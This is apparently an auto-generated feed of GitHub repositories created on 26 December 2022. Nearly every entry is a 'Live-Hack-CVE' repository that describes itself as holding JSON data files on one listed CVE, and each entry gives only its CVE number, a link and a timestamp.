**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21048 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21048](https://github.com/Live-Hack-CVE/CVE-2021-21048) create time: 2022-12-26T14:12:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21012 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21012](https://github.com/Live-Hack-CVE/CVE-2021-21012) create time: 2022-12-26T14:12:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0189 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0189](https://github.com/Live-Hack-CVE/CVE-2021-0189) create time: 2022-12-26T14:11:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0155 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0155](https://github.com/Live-Hack-CVE/CVE-2021-0155) create time: 2022-12-26T14:11:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0159 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0159](https://github.com/Live-Hack-CVE/CVE-2021-0159) create time: 2022-12-26T14:11:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0154 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0154](https://github.com/Live-Hack-CVE/CVE-2021-0154) create time: 2022-12-26T13:41:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0153 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0153](https://github.com/Live-Hack-CVE/CVE-2021-0153) create time: 2022-12-26T13:41:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46778 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46778](https://github.com/Live-Hack-CVE/CVE-2021-46778) create time: 2022-12-26T13:39:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33847 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33847](https://github.com/Live-Hack-CVE/CVE-2021-33847) create time: 2022-12-26T13:38:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30070 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30070](https://github.com/Live-Hack-CVE/CVE-2021-30070) create time: 2022-12-26T13:38:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44470 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44470](https://github.com/Live-Hack-CVE/CVE-2021-44470) create time: 2022-12-26T13:38:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26950 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26950](https://github.com/Live-Hack-CVE/CVE-2021-26950) create time: 2022-12-26T13:38:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23168 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23168](https://github.com/Live-Hack-CVE/CVE-2021-23168) create time: 2022-12-26T13:37:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26254 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26254](https://github.com/Live-Hack-CVE/CVE-2021-26254) create time: 2022-12-26T13:37:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23188 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23188](https://github.com/Live-Hack-CVE/CVE-2021-23188) create time: 2022-12-26T13:37:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23223 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23223](https://github.com/Live-Hack-CVE/CVE-2021-23223) create time: 2022-12-26T13:37:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46426 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46426](https://github.com/Live-Hack-CVE/CVE-2021-46426) create time: 2022-12-26T13:34:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32862 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32862](https://github.com/Live-Hack-CVE/CVE-2021-32862) create time: 2022-12-26T13:32:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44545 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44545](https://github.com/Live-Hack-CVE/CVE-2021-44545) create time: 2022-12-26T13:31:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37409 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37409](https://github.com/Live-Hack-CVE/CVE-2021-37409) create time: 2022-12-26T13:30:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35122 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35122](https://github.com/Live-Hack-CVE/CVE-2022-35122) create time: 2022-12-26T14:16:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28752 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28752](https://github.com/Live-Hack-CVE/CVE-2022-28752) create time: 2022-12-26T14:16:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35133 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35133](https://github.com/Live-Hack-CVE/CVE-2022-35133) create time: 2022-12-26T14:16:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28751 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28751](https://github.com/Live-Hack-CVE/CVE-2022-28751) create time: 2022-12-26T14:16:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22455 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22455](https://github.com/Live-Hack-CVE/CVE-2022-22455) create time: 2022-12-26T14:15:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36191 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36191](https://github.com/Live-Hack-CVE/CVE-2022-36191) create time: 2022-12-26T14:15:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35147 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35147](https://github.com/Live-Hack-CVE/CVE-2022-35147) create time: 2022-12-26T14:15:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2870 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2870](https://github.com/Live-Hack-CVE/CVE-2022-2870) create time: 2022-12-26T14:15:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35117 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35117](https://github.com/Live-Hack-CVE/CVE-2022-35117) create time: 2022-12-26T14:15:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2547 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2547](https://github.com/Live-Hack-CVE/CVE-2022-2547) create time: 2022-12-26T14:15:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2337 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2337](https://github.com/Live-Hack-CVE/CVE-2022-2337) create time: 2022-12-26T14:15:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2335 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2335](https://github.com/Live-Hack-CVE/CVE-2022-2335) create time: 2022-12-26T14:15:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35121 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35121](https://github.com/Live-Hack-CVE/CVE-2022-35121) create time: 2022-12-26T14:15:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35516 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35516](https://github.com/Live-Hack-CVE/CVE-2022-35516) create time: 2022-12-26T14:15:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36215 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36215](https://github.com/Live-Hack-CVE/CVE-2022-36215) create time: 2022-12-26T14:15:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36216 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36216](https://github.com/Live-Hack-CVE/CVE-2022-36216) create time: 2022-12-26T14:15:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29487 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29487](https://github.com/Live-Hack-CVE/CVE-2022-29487) create time: 2022-12-26T14:15:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28715 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28715](https://github.com/Live-Hack-CVE/CVE-2022-28715) create time: 2022-12-26T14:15:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25986 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25986](https://github.com/Live-Hack-CVE/CVE-2022-25986) create time: 2022-12-26T14:15:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29891 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29891](https://github.com/Live-Hack-CVE/CVE-2022-29891) create time: 2022-12-26T14:15:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2876 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2876](https://github.com/Live-Hack-CVE/CVE-2022-2876) create time: 2022-12-26T14:15:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30693 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30693](https://github.com/Live-Hack-CVE/CVE-2022-30693) create time: 2022-12-26T14:14:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30604 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30604](https://github.com/Live-Hack-CVE/CVE-2022-30604) create time: 2022-12-26T14:14:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32283 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32283](https://github.com/Live-Hack-CVE/CVE-2022-32283) create time: 2022-12-26T14:14:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32453 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32453](https://github.com/Live-Hack-CVE/CVE-2022-32453) create time: 2022-12-26T14:14:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33151 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33151](https://github.com/Live-Hack-CVE/CVE-2022-33151) create time: 2022-12-26T14:14:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32583 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32583](https://github.com/Live-Hack-CVE/CVE-2022-32583) create time: 2022-12-26T14:14:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32544 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32544](https://github.com/Live-Hack-CVE/CVE-2022-32544) create time: 2022-12-26T14:14:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33311 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33311](https://github.com/Live-Hack-CVE/CVE-2022-33311) create time: 2022-12-26T14:14:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2844 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2844](https://github.com/Live-Hack-CVE/CVE-2022-2844) create time: 2022-12-26T14:14:11Z

**no description** : [anonymouss1276/CVE-2022--45315](https://github.com/anonymouss1276/CVE-2022--45315) create time: 2022-12-26T11:06:47Z

**no description** : [anonymouss1276/Cve-2022-26809](https://github.com/anonymouss1276/Cve-2022-26809) create time: 2022-12-26T10:36:29Z

**no description** : [anonymouss1276/Cve-2022-30190](https://github.com/anonymouss1276/Cve-2022-30190) create time: 2022-12-26T10:29:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-25034 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-25034](https://github.com/Live-Hack-CVE/CVE-2018-25034) create time: 2022-12-26T09:14:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-25084 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-25084](https://github.com/Live-Hack-CVE/CVE-2019-25084) create time: 2022-12-26T09:14:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18222 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18222](https://github.com/Live-Hack-CVE/CVE-2019-18222) create time: 2022-12-26T09:12:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16910 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16910](https://github.com/Live-Hack-CVE/CVE-2019-16910) create time: 2022-12-26T09:12:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36629 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36629](https://github.com/Live-Hack-CVE/CVE-2020-36629) create time: 2022-12-26T09:14:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36628 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36628](https://github.com/Live-Hack-CVE/CVE-2020-36628) create time: 2022-12-26T09:14:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36627 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36627](https://github.com/Live-Hack-CVE/CVE-2020-36627) create time: 2022-12-26T09:14:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36632 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36632](https://github.com/Live-Hack-CVE/CVE-2020-36632) create time: 2022-12-26T09:13:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36631 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36631](https://github.com/Live-Hack-CVE/CVE-2020-36631) create time: 2022-12-26T09:13:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36630 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36630](https://github.com/Live-Hack-CVE/CVE-2020-36630) create time: 2022-12-26T09:13:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10941 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10941](https://github.com/Live-Hack-CVE/CVE-2020-10941) create time: 2022-12-26T09:12:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10932 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10932](https://github.com/Live-Hack-CVE/CVE-2020-10932) create time: 2022-12-26T09:12:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36425 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36425](https://github.com/Live-Hack-CVE/CVE-2020-36425) create time: 2022-12-26T09:12:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36424 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36424](https://github.com/Live-Hack-CVE/CVE-2020-36424) create time: 2022-12-26T09:12:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36423 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36423](https://github.com/Live-Hack-CVE/CVE-2020-36423) create time: 2022-12-26T09:12:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36422 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36422](https://github.com/Live-Hack-CVE/CVE-2020-36422) create time: 2022-12-26T09:12:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36426 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36426](https://github.com/Live-Hack-CVE/CVE-2020-36426) create time: 2022-12-26T09:11:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36421 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36421](https://github.com/Live-Hack-CVE/CVE-2020-36421) create time: 2022-12-26T09:11:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36478 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36478](https://github.com/Live-Hack-CVE/CVE-2020-36478) create time: 2022-12-26T09:11:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36476 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36476](https://github.com/Live-Hack-CVE/CVE-2020-36476) create time: 2022-12-26T09:11:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36475 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36475](https://github.com/Live-Hack-CVE/CVE-2020-36475) create time: 2022-12-26T09:11:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4277 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4277](https://github.com/Live-Hack-CVE/CVE-2021-4277) create time: 2022-12-26T09:14:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4276 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4276](https://github.com/Live-Hack-CVE/CVE-2021-4276) create time: 2022-12-26T09:14:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4278 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4278](https://github.com/Live-Hack-CVE/CVE-2021-4278) create time: 2022-12-26T09:14:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4280 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4280](https://github.com/Live-Hack-CVE/CVE-2021-4280) create time: 2022-12-26T09:13:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4279 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4279](https://github.com/Live-Hack-CVE/CVE-2021-4279) create time: 2022-12-26T09:13:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24119 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24119](https://github.com/Live-Hack-CVE/CVE-2021-24119) create time: 2022-12-26T09:12:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44732 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44732](https://github.com/Live-Hack-CVE/CVE-2021-44732) create time: 2022-12-26T09:11:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43666 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43666](https://github.com/Live-Hack-CVE/CVE-2021-43666) create time: 2022-12-26T09:11:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45467 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45467](https://github.com/Live-Hack-CVE/CVE-2021-45467) create time: 2022-12-26T09:10:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45466 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45466](https://github.com/Live-Hack-CVE/CVE-2021-45466) create time: 2022-12-26T09:10:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44855 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44855](https://github.com/Live-Hack-CVE/CVE-2021-44855) create time: 2022-12-26T09:10:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44854 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44854](https://github.com/Live-Hack-CVE/CVE-2021-44854) create time: 2022-12-26T09:10:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42898 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42898](https://github.com/Live-Hack-CVE/CVE-2022-42898) create time: 2022-12-26T09:15:02Z

